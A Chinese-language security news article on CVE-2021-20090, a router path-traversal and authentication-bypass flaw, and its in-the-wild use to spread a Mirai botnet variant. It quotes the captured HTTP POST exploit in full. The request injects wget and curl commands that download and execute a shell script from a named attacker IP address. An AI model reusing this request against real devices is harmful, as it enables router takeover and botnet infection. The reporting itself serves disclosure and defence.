研究人員發現9.9分漏洞在野利用，數百萬路由器設備受到影響。

　　CVE-2021-20090漏洞

　　CVE-2021-20090漏洞是Tenable研究人員8月3日公開的包含Arcadyan固件的路由器web接口路徑遍歷漏洞，CVSS評分9.9分。漏洞影響數百萬家用路由器設備和其他使用有漏洞的代碼庫的物聯網設備，包括部分互聯網服務提供商在內的不少于17家廠商的產品受到影響。

　　CVE-2021-20090漏洞是一個路徑遍歷漏洞，可能引發認證繞過。成功利用該漏洞后，攻擊者可以完全接管有漏洞的設備。比如，Tenable研究人員已經證明了如何在有漏洞的路由器上修改配置以啟用Telnet，并獲取訪問設備的root級shell訪問權限。

　　cve-2021-20090漏洞的技術細節參見：

　　https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2

　　在野漏洞利用

　　Juniper安全研究人員在監控一起惡意網絡活動流量時發現嘗試利用該漏洞的攻擊模式。攻擊者看似嘗試在受影響的路由器上使用腳本的方式來部署Mirai惡意軟件變種。

　　研究人員從今年2月18日開始監控到該攻擊活動，原始的攻擊來源與IP地址27.22.80[.]19，通過HTTP POST方法：

　　POST /images/%2fapply_abstract.cgi HTTP/1.1

　　Connection: close

　　User-Agent: Darkaction=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A

　　wget+http://212.192.241.72/lolol.sh;

　　curl+-O+http://212.192.241.72/lolol.sh;

　　chmod+777+lolol.sh;

　　sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

　　從該POST 請求中可以看出，攻擊者修改了被攻擊設備的配置信息使用“ARC_SYS_TelnetdEnable=1”來啟用Telnet，然后使用wget或curl從IP 地址212.192.241[.]72 處下載一個新的腳本，然后執行。研究人員分析該腳本payload并確認是Mirai僵尸網絡變種。

　　從6月6日到7月23日，研究人員發現攻擊者開始利用其它的漏洞：

　　CVE-2020-29557 （DLink路由器）

　　CVE-2021-1497 and CVE-2021-1498 （Cisco HyperFlex）

　　CVE-2021-31755  （Tenda AC11）

　　CVE-2021-22502 （MicroFocus OBR）

　　CVE-2021-22506 （MicroFocus AM）

　　這表明該攻擊組織正通過添加新的漏洞利用不斷擴展其攻擊活動。